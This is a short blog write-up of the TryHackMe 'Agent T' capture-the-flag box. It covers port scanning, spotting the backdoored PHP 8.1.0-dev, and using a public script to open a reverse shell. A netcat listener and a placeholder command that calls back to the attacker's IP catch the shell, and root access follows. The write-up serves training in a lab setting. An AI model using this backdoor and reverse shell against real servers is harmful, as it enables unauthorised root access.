TryHackMe CTF: Agent T

Nihir Zala
3 min readOct 8, 2023


This box was fun. At first, I was looking at the wrong place. After a few moments I realized how dumb I was.

Let’s start off with port scanning. I used rustscan to do this.

open port scan

# -a <IP> : IP of the victim machine

# -r1–65535: port range to scan (1 to 65535)

Only port 80 (http) is open. There was nothing useful in the ‘View-Source’ page. So, the next was to detect the version of the service used in port 80.

nmap service scan

# -sCV : Use default scripts and probe the port for version info

We can see that PHP version 8.1.0-dev is being used. This can also be found using burpsuite:

http response in burp

If we do a quick google search (sth like ‘PHP 8.1.0-dev exploit’) we can find that there is a backdoor in that version. I found a useful reverseshell script here.

We can use this script to gain a reverseshell. But, before that, we have to set up a netcat listener on a new terminal.

# -l: listen

# -v : verbose

# -p 1234: on port 1234 (-p has to be specified just before the port ‘1234’)

After this, we can run the script:

python3 <> <http://victim_ip> <your_ip> <port>

<> : the one you got from the github

There is a revershell connection in the tab where netcat is listening. There was no need for privilege escalation as I got the revershell as the ‘root’ user.

After traversing through some directories, I found the flag.


Walkthrough credit goes to



Nihir Zala
Nihir Zala

Written by Nihir Zala

Hi there, I'm Nihir Zala—a Laravel developer from Gujrat, India, with over 2.5 years of professional experience. I also learning Penetesting from THM and HTB.

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